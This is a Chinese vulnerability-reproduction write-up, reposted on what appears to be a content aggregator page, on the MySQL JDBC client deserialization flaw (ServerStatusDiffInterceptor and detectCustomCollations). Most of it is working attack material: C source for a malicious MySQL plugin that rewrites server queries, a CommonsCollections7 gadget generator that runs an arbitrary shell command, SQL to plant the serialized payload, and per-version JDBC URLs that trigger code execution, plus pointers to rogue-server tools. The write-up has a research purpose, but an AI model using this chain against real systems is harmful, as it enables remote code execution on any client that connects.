日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

dual mysql 获取序列_MySQL JDBC客户端反序列化漏洞

發布時間:2023/12/10 数据库 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 dual mysql 获取序列_MySQL JDBC客户端反序列化漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

標題: MySQL JDBC客戶端反序列化漏洞

☆?背景介紹
☆?學習思路
☆?搭建測試環境
☆?惡意MySQL插件
????1)?獲取MySQL?5.7.28源碼
????2)?在rewrite_example基礎上修改出evilreplace
☆?測試rewriter插件
????1)?安裝rewriter.so
????2)?在服務端替換SQL查詢語句
????3)?卸載rewriter.so
????4)?rewriter插件的局限性
☆?漏洞相關的SQL查詢語句
????1)?SHOW?SESSION?STATUS
????2)?SHOW?COLLATION
☆?復現漏洞
????1)?GenerateCommonsCollections7.java
????2)?創建惡意表
????3)?用evilreplace插件改變SQL查詢語句
????4)?JDBCClient.java
????5)?MySQL?Connector/J?各版本所需URL(ServerStatusDiffInterceptor)
????????5.1)?8.x
????????????5.1.1)?簡化版調用關系
????????????5.1.2)?mysql-connector-java-8.0.14.pcap
????????5.2)?6.x
????????????5.2.2)?mysql-connector-java-6.0.3.pcap
????????5.3)?5.1.11及以上版本
????????????5.3.2)?mysql-connector-java-5.1.40.pcap
????6)?MySQL?Connector/J?各版本所需URL(detectCustomCollations)
????????6.1)?5.1.29-5.1.40
????????????6.1.1)?簡化版調用關系
????????????6.1.2)?mysql-connector-java-5.1.40_d.pcap
????????6.2)?5.1.19-5.1.28
????????????6.2.2)?mysql-connector-java-5.1.19_d.pcap
????7)?Python版惡意服務端
????????7.1)?fnmsd的實現
????????7.2)?其他思路
☆?參考資源

☆ 背景介紹

2019年11月底Yang Zhang等人在BlackHat上有個議題,提到MySQL JDBC客戶端反序列化漏洞,用到ServerStatusDiffInterceptor,參[1]。

2019年12月Welkin給出了部分細節,但當時未解決惡意服務端的組建問題,參[2]。

codeplutos利用修改過的MySQL插件成功組建惡意服務端,這個腦洞開得可以。與此同時,他演示了另一條利用路徑,用到detectCustomCollations。需要指出,他的方案原理同時適用于ServerStatusDiffInterceptor、detectCustomCollations,他只以后者舉例而已。參[3]。

2020年4月fnmsd分析MySQL Connector/J各版本后給出大一統的總結,給出不同版本所需URL,給了Python版惡意服務端,參[4]。

2020年5月我學習前幾位的大作,寫了這篇筆記。

☆ 學習思路

先將[1]、[2]、[3]、[4]全看了一遍,沒做實驗,只是看。對這個洞大概有點數,通過JDBC建立到MySQL服務端的連接時,有幾個內置的SQL查詢語句被發出,其中兩個查詢的結果集在客戶端被處理時會調用ObjectInputStream.readObject()進行反序列化。通過控制結果集,可以在客戶端搞事,具體危害視客戶端擁有的Gadget環境而定。

這兩個查詢語句是:

SHOW SESSION STATUS
SHOW COLLATION

利用MySQL插件機制將這兩個查詢語句在服務端"重定向"成查詢惡意表,惡意表中某字段存放惡意Object。

需要安裝MySQL,創建惡意表,編譯定制過的惡意MySQL插件。寫一個通用的JDBC客戶端程序,用之訪問惡意服務端。用Wireshark抓包,基于抓包數據用Python實現簡版惡意服務端,這樣可以避免陷入MySQL私有協議細節當中。

☆ 搭建測試環境

參看

《惡意MySQL Server讀取MySQL Client端文件》
http://scz.617.cn/network/202001101612.txt

☆ 惡意MySQL插件

1) 獲取MySQL 5.7.28源碼

https://repo.mysql.com/yum/mysql-5.7-community/el/7/SRPMS/mysql-community-5.7.28-1.el7.src.rpm

2) 在rewrite_example基礎上修改出evilreplace

$?vi?evilreplace.cc

#include?
#include?

#include?
#include?
#include?
#include?
#include??//?my_thread_handle?needed?by?mysql_memory.h
#include?

/*?instrument?the?memory?allocation?*/
#ifdef?HAVE_PSI_INTERFACE
static?PSI_memory_key?key_memory_evilreplace;

static?PSI_memory_info?all_rewrite_memory[]=
{
??{?&key_memory_evilreplace,?"evilreplace",?0?}
};

static?int?plugin_init(MYSQL_PLUGIN){
??const?char*?category=?"sql";
??int?count;

??count=?array_elements(all_rewrite_memory);
??mysql_memory_register(category,?all_rewrite_memory,?count);
??return?0;?/*?success?*/
}
#else
#define?plugin_init?NULL
#define?key_memory_evilreplace?PSI_NOT_INSTRUMENTED
#endif?/*?HAVE_PSI_INTERFACE?*/


static?int?rewrite_lower(MYSQL_THD?thd,?mysql_event_class_t?event_class,const?void?*event){
??if?(event_class?==?MYSQL_AUDIT_PARSE_CLASS)
??{
????const?struct?mysql_event_parse?*event_parse=static_cast(event);
????if?(event_parse->event_subclass?==?MYSQL_AUDIT_PARSE_PREPARSE)
????{
????????if
????????(
????????????(?strcmp(?event_parse->query.str,?"SHOW?SESSION?STATUS"?)?==?0?)
????????????||
????????????(?strcmp(?event_parse->query.str,?"SHOW?COLLATION"?)?==?0?)
????????)
????????{
????????????char????evilsql[]???????=?"select?evil_1,evil_2,evil_3?from?evildb.eviltable?limit?1;";
????????????char???*rewritten_query?=?static_cast<char?*>
????????????(
????????????????my_malloc
????????????????(
????????????????????key_memory_evilreplace,
????????????????????strlen(?evilsql?)?+?1,
????????????????????MYF(0)
????????????????)
????????????);
????????????strcpy(?rewritten_query,?evilsql?);
????????????event_parse->rewritten_query->str???????=?rewritten_query;
????????????event_parse->rewritten_query->length????=?strlen(?evilsql?)?+?1;
????????????*((int?*)event_parse->flags)???????????|=?(int)MYSQL_AUDIT_PARSE_REWRITE_PLUGIN_QUERY_REWRITTEN;
????????}
????}
??}

??return?0;
}

/*?Audit?plugin?descriptor?*/
static?struct?st_mysql_audit?evilreplace_descriptor=
{
??MYSQL_AUDIT_INTERFACE_VERSION,????????????????????/*?interface?version?*/
??NULL,?????????????????????????????????????????????/*?release_thd()?????*/
??rewrite_lower,????????????????????????????????????/*?event_notify()????*/
??{?0,
????0,
????(unsigned?long)?MYSQL_AUDIT_PARSE_ALL,?}????????/*?class?mask????????*/
};

/*?Plugin?descriptor?*/
mysql_declare_plugin(audit_log)
{
??MYSQL_AUDIT_PLUGIN,?????????????/*?plugin?type???????????????????*/
??&evilreplace_descriptor,????/*?type?specific?descriptor??????*/
??"evilreplace",??????????????/*?plugin?name???????????????????*/
??"Oracle",???????????????????????/*?author????????????????????????*/
??"An?example?of?a?query?rewrite"
??"?plugin?that?rewrites?all?queries"
??"?to?lower?case",???????????????/*?description???????????????????*/
??PLUGIN_LICENSE_GPL,?????????????/*?license???????????????????????*/
??plugin_init,????????????????????/*?plugin?initializer????????????*/
??NULL,???????????????????????????/*?plugin?deinitializer??????????*/
??0x0002,?????????????????????????/*?version???????????????????????*/
??NULL,???????????????????????????/*?status?variables??????????????*/
??NULL,???????????????????????????/*?system?variables??????????????*/
??NULL,???????????????????????????/*?reserverd?????????????????????*/
??0???????????????????????????????/*?flags?????????????????????????*/
}
mysql_declare_plugin_end;

參[3],codeplutos介紹了Ubuntu 16.04下的MySQL插件編譯方案。各發行版的編譯過程差別較大,RedHat 7.6上明顯不同,建議先搞清楚如何編譯MySQL源碼,再來編譯單個插件。

編譯:

/usr/bin/c++?-DHAVE_CONFIG_H?-DHAVE_LIBEVENT2?-DMYSQL_DYNAMIC_PLUGIN?-D_FILE_OFFSET_BITS=64?\
-D_GNU_SOURCE?-Devilreplace_EXPORTS?-Wall?-Wextra?-Wformat-security?-Wvla?-Woverloaded-virtual?\
-Wno-unused-parameter?-O3?-g?-fabi-version=2?-fno-omit-frame-pointer?-fno-strict-aliasing?-DDBUG_OFF?-fPIC?\
-I//mysql-5.7.28/include?\
-I//mysql-5.7.28/extra/rapidjson/include?\
-I//mysql-5.7.28/libbinlogevents/include?\
-I//mysql-5.7.28/libbinlogevents/export?\
-isystem?//mysql-5.7.28/zlib?\
-I//mysql-5.7.28/sql?\
-I//mysql-5.7.28/sql/auth?\
-I//mysql-5.7.28/regex?\
-o?evilreplace.cc.o?\
-c?evilreplace.cc

鏈接:

/usr/bin/c++?-fPIC?-Wall?-Wextra?-Wformat-security?-Wvla?-Woverloaded-virtual?-Wno-unused-parameter?\
-O3?-g?-fabi-version=2?-fno-omit-frame-pointer?-fno-strict-aliasing?-DDBUG_OFF?\
-fPIC?-shared?-Wl,-soname,evilreplace.so?-o?evilreplace.so?\
evilreplace.cc.o?-lpthread?\
//libmysqlservices.a?-lpthread

☆ 測試rewriter插件

rewriter.so是自帶的插件,不需要源碼編譯。

1) 安裝rewriter.so

查看:

/usr/share/mysql/install_rewriter.sql

除了安裝rewriter.so,還涉及輔助表和存儲過程的創建。

mysql> source /usr/share/mysql/install_rewriter.sql

這會多出query_rewrite庫、query_rewrite.rewrite_rules表。

mysql>?show?plugins;
+----------------------------+----------+--------------------+----------------------+---------+
|?Name???????????????????????|?Status???|?Type???????????????|?Library??????????????|?License?|
+----------------------------+----------+--------------------+----------------------+---------+
...
|?Rewriter???????????????????|?ACTIVE???|?AUDIT??????????????|?rewriter.so??????????|?GPL?????|
+----------------------------+----------+--------------------+----------------------+---------+

mysql>?SHOW?GLOBAL?VARIABLES?LIKE?'rewriter_enabled';
+------------------+-------+
|?Variable_name????|?Value?|
+------------------+-------+
|?rewriter_enabled?|?ON????|
+------------------+-------+

2) 在服務端替換SQL查詢語句

向query_rewrite.rewrite_rules表中插入替換規則:

mysql>?insert?into?query_rewrite.rewrite_rules(pattern,?replacement)?values('select?line?from?sczdb.SczTable',?'select?line?from?sczdb.scztable?limit?1');

調用存儲過程刷新,使之熱生效:

mysql>?call?query_rewrite.flush_rewrite_rules();

測試替換規則:

mysql>?select?line?from?sczdb.SczTable;
+---------------------------------+
|?line????????????????????????????|
+---------------------------------+
|?root:x:0:0:root:/root:/bin/bash?|
+---------------------------------+

3) 卸載rewriter.so

mysql>?source?/usr/share/mysql/uninstall_rewriter.sql

只有退出當前客戶端才徹底卸載rewriter插件,否則其仍在生效中。

4) rewriter插件的局限性

清空表,二選一,推薦后者:

delete?from?query_rewrite.rewrite_rules;
truncate?table?query_rewrite.rewrite_rules;

mysql>?insert?into?query_rewrite.rewrite_rules(pattern,?replacement)?values('SHOW?SESSION?STATUS',?'select?*?from?evildb.eviltable');

mysql>?select?*?from?query_rewrite.rewrite_rules;
+----+---------------------+------------------+--------------------------------+---------+---------+----------------+--------------------+
|?id?|?pattern?????????????|?pattern_database?|?replacement????????????????????|?enabled?|?message?|?pattern_digest?|?normalized_pattern?|
+----+---------------------+------------------+--------------------------------+---------+---------+----------------+--------------------+
|??1?|?SHOW?SESSION?STATUS?|?NULL?????????????|?select?*?from?evildb.eviltable?|?YES?????|?NULL????|?NULL???????????|?NULL???????????????|
+----+---------------------+------------------+--------------------------------+---------+---------+----------------+--------------------+

mysql>?call?query_rewrite.flush_rewrite_rules();
ERROR?1644?(45000):?Loading?of?some?rule(s)?failed.

調用存儲過程刷新時意外失敗,查看失敗原因:

mysql>?select?message?from?query_rewrite.rewrite_rules;
+-------------------------------------------+
|?message???????????????????????????????????|
+-------------------------------------------+
|?Pattern?needs?to?be?a?a?select?statement.?|
+-------------------------------------------+

pattern必須是select語句,show語句不行。

據說5.7的pattern只支持select,8.0支持insert、update、delete,未實測驗證。難怪codeplutos要修改rewrite_example.cc。

☆ 漏洞相關的SQL查詢語句

1) SHOW SESSION STATUS

mysql>?help?SHOW
...
SHOW?COLLATION?[like_or_where]
...
SHOW?[GLOBAL?|?SESSION]?STATUS?[like_or_where]
...
If?the?syntax?for?a?given?SHOW?statement?includes?a?LIKE?'pattern'
part,?'pattern'?is?a?string?that?can?contain?the?SQL?%?and?_?wildcard
characters.?The?pattern?is?useful?for?restricting?statement?output?to
matching?values.

...

URL:?https://dev.mysql.com/doc/refman/5.7/en/show.html

mysql>?help?SHOW?STATUS

...

URL:?https://dev.mysql.com/doc/refman/5.7/en/show-status.html

"SHOW SESSION STATUS"訪問INFORMATION_SCHEMA.SESSION_STATUS表。參[2],作者說訪問INFORMATION_SCHEMA.SESSION_VARIABLES表,他應該說錯了。

查看INFORMATION_SCHEMA.SESSION_STATUS表結構:

mysql>?select?table_schema,table_name,column_name,column_type?from?information_schema.columns?where?table_name='SESSION_STATUS';
+--------------------+----------------+----------------+---------------+
|?table_schema???????|?table_name?????|?column_name????|?column_type???|
+--------------------+----------------+----------------+---------------+
|?information_schema?|?SESSION_STATUS?|?VARIABLE_NAME??|?varchar(64)???|
|?information_schema?|?SESSION_STATUS?|?VARIABLE_VALUE?|?varchar(1024)?|
+--------------------+----------------+----------------+---------------+

直接訪問INFORMATION_SCHEMA.SESSION_STATUS表缺省會失敗:

mysql>?select?VARIABLE_NAME,VARIABLE_VALUE?from?INFORMATION_SCHEMA.SESSION_STATUS?limit?10;
ERROR?3167?(HY000):?The?'INFORMATION_SCHEMA.SESSION_STATUS'?feature?is?disabled;?see?the?documentation?for?'show_compatibility_56'

需要打開一個開關:

mysql>?set?@@global.show_compatibility_56=ON;

mysql>?select?*?from?INFORMATION_SCHEMA.SESSION_STATUS?limit?10;
mysql>?select?VARIABLE_NAME,VARIABLE_VALUE?from?INFORMATION_SCHEMA.SESSION_STATUS?limit?10;
+----------------------------+----------------+
|?VARIABLE_NAME??????????????|?VARIABLE_VALUE?|
+----------------------------+----------------+
|?ABORTED_CLIENTS????????????|?1??????????????|
|?ABORTED_CONNECTS???????????|?0??????????????|
|?BINLOG_CACHE_DISK_USE??????|?0??????????????|
|?BINLOG_CACHE_USE???????????|?0??????????????|
|?BINLOG_STMT_CACHE_DISK_USE?|?0??????????????|
|?BINLOG_STMT_CACHE_USE??????|?0??????????????|
|?BYTES_RECEIVED?????????????|?2809???????????|
|?BYTES_SENT?????????????????|?11620??????????|
|?COM_ADMIN_COMMANDS?????????|?0??????????????|
|?COM_ASSIGN_TO_KEYCACHE?????|?0??????????????|
+----------------------------+----------------+

2) SHOW COLLATION

mysql>?help?SHOW?COLLATION;

...

URL:?https://dev.mysql.com/doc/refman/5.7/en/show-collation.html

mysql>?SHOW?COLLATION?WHERE?Charset='latin1';
+-------------------+---------+----+---------+----------+---------+
|?Collation?????????|?Charset?|?Id?|?Default?|?Compiled?|?Sortlen?|
+-------------------+---------+----+---------+----------+---------+
|?latin1_german1_ci?|?latin1??|??5?|?????????|?Yes??????|???????1?|
|?latin1_swedish_ci?|?latin1??|??8?|?Yes?????|?Yes??????|???????1?|
|?latin1_danish_ci??|?latin1??|?15?|?????????|?Yes??????|???????1?|
|?latin1_german2_ci?|?latin1??|?31?|?????????|?Yes??????|???????2?|
|?latin1_bin????????|?latin1??|?47?|?????????|?Yes??????|???????1?|
|?latin1_general_ci?|?latin1??|?48?|?????????|?Yes??????|???????1?|
|?latin1_general_cs?|?latin1??|?49?|?????????|?Yes??????|???????1?|
|?latin1_spanish_ci?|?latin1??|?94?|?????????|?Yes??????|???????1?|
+-------------------+---------+----+---------+----------+---------+

"SHOW COLLATION"訪問INFORMATION_SCHEMA.COLLATIONS表。

查看INFORMATION_SCHEMA.COLLATIONS表結構:

mysql>?select?table_schema,table_name,column_name,column_type?from?information_schema.columns?where?table_name='COLLATIONS';
+--------------------+------------+--------------------+-------------+
|?table_schema???????|?table_name?|?column_name????????|?column_type?|
+--------------------+------------+--------------------+-------------+
|?information_schema?|?COLLATIONS?|?COLLATION_NAME?????|?varchar(32)?|
|?information_schema?|?COLLATIONS?|?CHARACTER_SET_NAME?|?varchar(32)?|
|?information_schema?|?COLLATIONS?|?ID?????????????????|?bigint(11)??|
|?information_schema?|?COLLATIONS?|?IS_DEFAULT?????????|?varchar(3)??|
|?information_schema?|?COLLATIONS?|?IS_COMPILED????????|?varchar(3)??|
|?information_schema?|?COLLATIONS?|?SORTLEN????????????|?bigint(3)???|
+--------------------+------------+--------------------+-------------+

可以直接訪問INFORMATION_SCHEMA.COLLATIONS表,與show_compatibility_56無關。

mysql>?show?variables?like?'show_compatibility_56';
+-----------------------+-------+
|?Variable_name?????????|?Value?|
+-----------------------+-------+
|?show_compatibility_56?|?OFF???|
+-----------------------+-------+

mysql>?select?*?from?INFORMATION_SCHEMA.COLLATIONS?limit?5;
+------------------+--------------------+----+------------+-------------+---------+
|?COLLATION_NAME???|?CHARACTER_SET_NAME?|?ID?|?IS_DEFAULT?|?IS_COMPILED?|?SORTLEN?|
+------------------+--------------------+----+------------+-------------+---------+
|?big5_chinese_ci??|?big5???????????????|??1?|?Yes????????|?Yes?????????|???????1?|
|?big5_bin?????????|?big5???????????????|?84?|????????????|?Yes?????????|???????1?|
|?dec8_swedish_ci??|?dec8???????????????|??3?|?Yes????????|?Yes?????????|???????1?|
|?dec8_bin?????????|?dec8???????????????|?69?|????????????|?Yes?????????|???????1?|
|?cp850_general_ci?|?cp850??????????????|??4?|?Yes????????|?Yes?????????|???????1?|
+------------------+--------------------+----+------------+-------------+---------+

☆ 復現漏洞

1) GenerateCommonsCollections7.java

/*
?*?javac?-encoding?GBK?-g?-cp?"commons-collections-3.1.jar"?GenerateCommonsCollections7.java
?*?java?-cp?"commons-collections-3.1.jar:."?GenerateCommonsCollections7?"/bin/touch?/tmp/scz_is_here"?/tmp/out.bin
?*/
import?java.io.*;
import?java.util.*;
import?java.lang.reflect.*;
import?javax.naming.*;
import?org.apache.commons.collections.Transformer;
import?org.apache.commons.collections.functors.*;
import?org.apache.commons.collections.map.LazyMap;

public?class?GenerateCommonsCollections7{
????/*
?????*?ysoserial/CommonsCollections7
?????*/
????@SuppressWarnings("unchecked")
????private?static?Object?getObject?(?String?cmd?)?throws?Exception{
????????Transformer[]???tarray??????=?new?Transformer[]
????????{
????????????new?ConstantTransformer(?Runtime.class?),
????????????new?InvokerTransformer
????????????(
????????????????"getMethod",
????????????????new?Class[]
????????????????{
????????????????????String.class,
????????????????????Class[].class
????????????????},
????????????????new?Object[]
????????????????{
????????????????????"getRuntime",
????????????????????new?Class[0]
????????????????}
????????????),
????????????new?InvokerTransformer
????????????(
????????????????"invoke",
????????????????new?Class[]
????????????????{
????????????????????Object.class,
????????????????????Object[].class
????????????????},
????????????????new?Object[]
????????????????{
????????????????????null,
????????????????????new?Object[0]
????????????????}
????????????),
????????????new?InvokerTransformer
????????????(
????????????????"exec",
????????????????new?Class[]
????????????????{
????????????????????String[].class
????????????????},
????????????????new?Object[]
????????????????{
????????????????????new?String[]
????????????????????{
????????????????????????"/bin/bash",
????????????????????????"-c",
????????????????????????cmd
????????????????????}
????????????????}
????????????)
????????};
????????Transformer?????tchain??????=?new?ChainedTransformer(?new?Transformer[0]?);
????????Map?????????????normalMap_0?=?new?HashMap();
????????Map?????????????normalMap_1?=?new?HashMap();
????????Map?????????????lazyMap_0???=?LazyMap.decorate(?normalMap_0,?tchain?);
????????Map?????????????lazyMap_1???=?LazyMap.decorate(?normalMap_1,?tchain?);
????????lazyMap_0.put(?"scz",?"same"?);
????????lazyMap_1.put(?"tDz",?"same"?);
????????Hashtable???????ht??????????=?new?Hashtable();
????????ht.put(?lazyMap_0,?"value_0"?);
????????ht.put(?lazyMap_1,?"value_1"?);
????????lazyMap_1.remove(?"scz"?);
????????Field???????????f???????????=?ChainedTransformer.class.getDeclaredField(?"iTransformers"?);
????????f.setAccessible(?true?);
????????f.set(?tchain,?tarray?);
????????return(?ht?);
????}

????public?static?void?main?(?String[]?argv?)?throws?Exception{
????????String??????????????cmd?????=?argv[0];
????????String??????????????out?????=?argv[1];
????????Object??????????????obj?????=?getObject(?cmd?);
????????FileOutputStream????fos?=?new?FileOutputStream(?out?);
????????ObjectOutputStream??oos?=?new?ObjectOutputStream(?fos?);
????????oos.writeObject(?obj?);
????????oos.close();
????????fos.close();
????}
}
java?-cp?"commons-collections-3.1.jar:."?GenerateCommonsCollections7?"/bin/touch?/tmp/scz_is_here"?/tmp/out.bin
xxd?-p?-c?1000000?/tmp/out.bin

輸出形如:

aced00057372…3178

2) 創建惡意表

DROP?TABLE?IF?EXISTS?evildb.eviltable;
DROP?DATABASE?IF?EXISTS?evildb;

CREATE?DATABASE?IF?NOT?EXISTS?evildb;
CREATE?TABLE?IF?NOT?EXISTS?evildb.eviltable
(
????evil_1??int(5),
????evil_2??blob,
????evil_3??int(5)
);

set?@obj=0xaced00057372...3178;

INSERT?INTO?evildb.eviltable?VALUES?(1,?@obj,?3);

UPDATE?evildb.eviltable?SET?evil_1=1,?evil_2=@obj,?evil_3=3;

select?lower(hex(evil_2))?from?evildb.eviltable;

SHOW?GRANTS?FOR?root;
GRANT?ALL?ON?evildb.eviltable?TO?'root'@'%';
REVOKE?ALL?ON?evildb.eviltable?FROM?'root'@'%';

evil_1、evil_3也可以用blob類型,填充同樣的@obj,觸發點略有差異。上面演示的惡意表是最小集,通吃。

3) 用evilreplace插件改變SQL查詢語句

用evilreplace插件將來自客戶端的:

SHOW SESSION STATUS
SHOW COLLATION

替換成:

select?evil_1,evil_2,evil_3?from?evildb.eviltable?limit?1;

參[3],這是codeplutos的思路,很有想像力,他用了自編譯rewrite_example.so。

INSTALL?PLUGIN?evilreplace?SONAME?'evilreplace.so';

SHOW?SESSION?STATUS;
SHOW?COLLATION;

UNINSTALL?PLUGIN?evilreplace;

4) JDBCClient.java

/*
?*?javac?-encoding?GBK?-g?JDBCClient.java
?*/
import?java.io.*;
import?java.sql.*;

public?class?JDBCClient{
????public?static?void?main?(?String[]?argv?)?throws?Exception{
????????String??????url?????=?argv[0];
????????Connection??conn????=?DriverManager.getConnection(?url?);
????}
}

JDBCClient.java無需顯式代碼:

Class.forName(?"com.mysql.cj.jdbc.Driver"?);

5) MySQL Connector/J 各版本所需URL(ServerStatusDiffInterceptor)

參[4],fnmsd分析了各種版本所需URL。

5.1) 8.x

java?\
-cp?"mysql-connector-java-8.0.14.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"

5.1.1) 簡化版調用關系

DriverManager.getConnection?????????????????????????????????????????//?8u232+8.0.14
??DriverManager.getConnection???????????????????????????????????????//?DriverManager:270
????NonRegisteringDriver.connect????????????????????????????????????//?DriverManager:664
??????ConnectionImpl.getInstance????????????????????????????????????//?NonRegisteringDriver:199
????????ConnectionImpl.???????????????????????????????????????//?ConnectionImpl:240
??????????ConnectionImpl.initializeSafeQueryInterceptors????????????//?ConnectionImpl:448
??????????ConnectionImpl.createNewIO????????????????????????????????//?ConnectionImpl:455
????????????ConnectionImpl.connectOneTryOnly????????????????????????//?ConnectionImpl:825
??????????????ConnectionImpl.initializePropsFromServer??????????????//?ConnectionImpl:966
????????????????ConnectionImpl.handleAutoCommitDefaults?????????????//?ConnectionImpl:1327
??????????????????ConnectionImpl.setAutoCommit??????????????????????//?ConnectionImpl:1382
????????????????????NativeSession.execSQL???????????????????????????//?ConnectionImpl:2064//?查詢語句"SET?autocommit=1"
??????????????????????NativeProtocol.sendQueryString????????????????//?NativeSession:1154
????????????????????????NativeProtocol.sendQueryPacket??????????????//?NativeProtocol:921if?(this.queryInterceptors?!=?null)???????//?NativeProtocol:969
??????????????????????????NativeProtocol.invokeQueryInterceptorsPre?//?NativeProtocol:970
????????????????????????????NoSubInterceptorWrapper.preProcess??????//?NativeProtocol:1144
??????????????????????????????ServerStatusDiffInterceptor.preProcess//?NoSubInterceptorWrapper:76
????????????????????????????????ServerStatusDiffInterceptor.populateMapWithSessionStatusValues//?ServerStatusDiffInterceptor:105
??????????????????????????????????rs?=?stmt.executeQuery("SHOW?SESSION?STATUS")//?ServerStatusDiffInterceptor:86//?自動提交SQL查詢
??????????????????????????????????ResultSetUtil.resultSetToMap??????//?ServerStatusDiffInterceptor:87
????????????????????????????????????ResultSetImpl.getObject?????????//?ResultSetUtil:46//?mappedValues.put(rs.getObject(1),?rs.getObject(2))//?處理結果集中第1、2列if?((field.isBinary())?||?(field.isBlob()))//?ResultSetImpl:1314
??????????????????????????????????????byte[]?data?=?getBytes(columnIndex)//?ResultSetImpl:1315if?(this.connection.getPropertySet().getBooleanProperty(PropertyKey.autoDeserialize).getValue())//?ResultSetImpl:1317//?要求autoDeserialize等于true
??????????????????????????????????????ObjectInputStream.readObject??//?ResultSetImpl:1326//?obj?=?objIn.readObject();
????????????????????????????????????????Hashtable.readObject????????//?ysoserial/CommonsCollections7
??????????????????????????????????????????Hashtable.reconstitutionPut
????????????????????????????????????????????AbstractMapDecorator.equals
??????????????????????????????????????????????AbstractMap.equals
????????????????????????????????????????????????LazyMap.get?????????//?此處開始LazyMap利用鏈
??????????????????????????????????????????????????ChainedTransformer.transform
????????????????????????????????????????????????????InvokerTransformer.transform
??????????????????????????????????????????????????????Runtime.execif?(this.queryInterceptors?!=?null)???????//?NativeProtocol:1109
??????????????????????????NativeProtocol.invokeQueryInterceptorsPost//?NativeProtocol:1110

5.1.2) mysql-connector-java-8.0.14.pcap

請自行抓包,此處略

5.2) 6.x

queryInterceptors => statementInterceptors

java?\
-cp?"mysql-connector-java-6.0.3.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"

5.2.2) mysql-connector-java-6.0.3.pcap

請自行抓包,此處略

5.3) 5.1.11及以上版本

com.mysql.cj. => com.mysql.

java?\
-cp?"mysql-connector-java-5.1.40.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"

5.3.2) mysql-connector-java-5.1.40.pcap

請自行抓包,此處略

6) MySQL Connector/J 各版本所需URL(detectCustomCollations)

參[3],觸發方式是codeplutos提供的。重點看這個函數:

com.mysql.jdbc.ConnectionImpl.buildCollationMapping()

參[4],fnmsd分析了各種版本所需URL。

6.1) 5.1.29-5.1.40

java?\
-cp?"mysql-connector-java-5.1.40.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true&detectCustomCollations=true"

會拋異常,但惡意代碼已被執行。

6.1.1) 簡化版調用關系

DriverManager.getConnection?????????????????????????????????????????//?8u232+5.1.40
??DriverManager.getConnection???????????????????????????????????????//?DriverManager:270
????NonRegisteringDriver.connect????????????????????????????????????//?DriverManager:664
??????ConnectionImpl.getInstance????????????????????????????????????//?NonRegisteringDriver:328
????????Util.handleNewInstance??????????????????????????????????????//?ConnectionImpl:410
??????????Constructor.newInstance???????????????????????????????????//?Util:425JDBC4Connection.<init>ConnectionImpl.<init>?????????????????????????????????//?JDBC4Connection:47ConnectionImpl.initializeSafeStatementInterceptors??//?ConnectionImpl:805ConnectionImpl.createNewIO??????????????????????????//?ConnectionImpl:806ConnectionImpl.connectOneTryOnly??????????????????//?ConnectionImpl:2083ConnectionImpl.initializePropsFromServer????????//?ConnectionImpl:2297if?(versionMeetsMinimum(3,?21,?22))???????????//?ConnectionImpl:3282ConnectionImpl.buildCollationMapping??????????//?ConnectionImpl:3291if?((versionMeetsMinimum(4,?1,?0))?&&?(getDetectCustomCollations()))//?ConnectionImpl:944//?5.1.28版只檢查版本號,未檢查detectCustomCollations屬性results?=?stmt.executeQuery("SHOW?COLLATION")//?ConnectionImpl:957//?自動提交SQL查詢if?(versionMeetsMinimum(5,?0,?0))???????????//?ConnectionImpl:958Util.resultSetToMap?????????????????????????//?ConnectionImpl:959//?Util.resultSetToMap(sortedCollationMap,?results,?3,?2)//?處理結果集中第3、2列ResultSetImpl.getObject???????????????????//?Util:474//?mappedValues.put(rs.getObject(key),?rs.getObject(value))ResultSetImpl.getObjectDeserializingIfNeeded//?ResultSetImpl:4544byte[]?data?=?getBytes(columnIndex)???//?ResultSetImpl:4568ObjectInputStream.readObject??????????//?ResultSetImpl:4579//?obj?=?objIn.readObject()Hashtable.readObject????????????????//?ysoserial/CommonsCollections7Hashtable.reconstitutionPutAbstractMapDecorator.equalsAbstractMap.equalsLazyMap.get?????????????????//?此處開始LazyMap利用鏈ChainedTransformer.transformInvokerTransformer.transformRuntime.exec

6.1.2) mysql-connector-java-5.1.40_d.pcap

請自行抓包,此處略

6.2) 5.1.19-5.1.28

不需要指定"detectCustomCollations=true"

java?\
-cp?"mysql-connector-java-5.1.19.jar:commons-collections-3.1.jar:."?\
JDBCClient?"jdbc:mysql://192.168.65.23:3306/evildb?useSSL=false&user=root&password=123456&\
autoDeserialize=true"

6.2.2) mysql-connector-java-5.1.19_d.pcap

請自行抓包,此處略

7) Python版惡意服務端

7.1) fnmsd的實現

https://github.com/fnmsd/MySQL_Fake_Server

他這個實現同時支持ServerStatusDiffInterceptor、detectCustomCollations,還支持"惡意MySQL Server讀取MySQL Client端文件",只需要Python3。

他在"踩過的坑"里寫了一些值得注意的點,有興趣者可以看他的源碼。

7.2) 其他思路

fnmsd的實現,功能完備。如果只是想搞標題所說漏洞,我說個別的思路。可以基于Gifts版本實現反序列化惡意服務端:

https://github.com/Gifts/Rogue-MySql-Server

ServerStatusDiffInterceptor適用范圍包含detectCustomCollations適用范圍,為了減少麻煩,可以只支持ServerStatusDiffInterceptor。具體來說,就是只特殊響應"SHOW SESSION STATUS",不特殊響應"SHOW COLLATION"。

基于三次抓包組織響應報文:

mysql-connector-java-5.1.40.pcap
mysql-connector-java-6.0.3.pcap
mysql-connector-java-8.0.14.pcap

要點如下:

5.1.11及以上版本
6.x

????特殊響應"SHOW?SESSION?STATUS",然后必須特殊響應隨后而來的
????"SHOW?WARNINGS"。
8.x
????按抓包所示響應初始查詢:
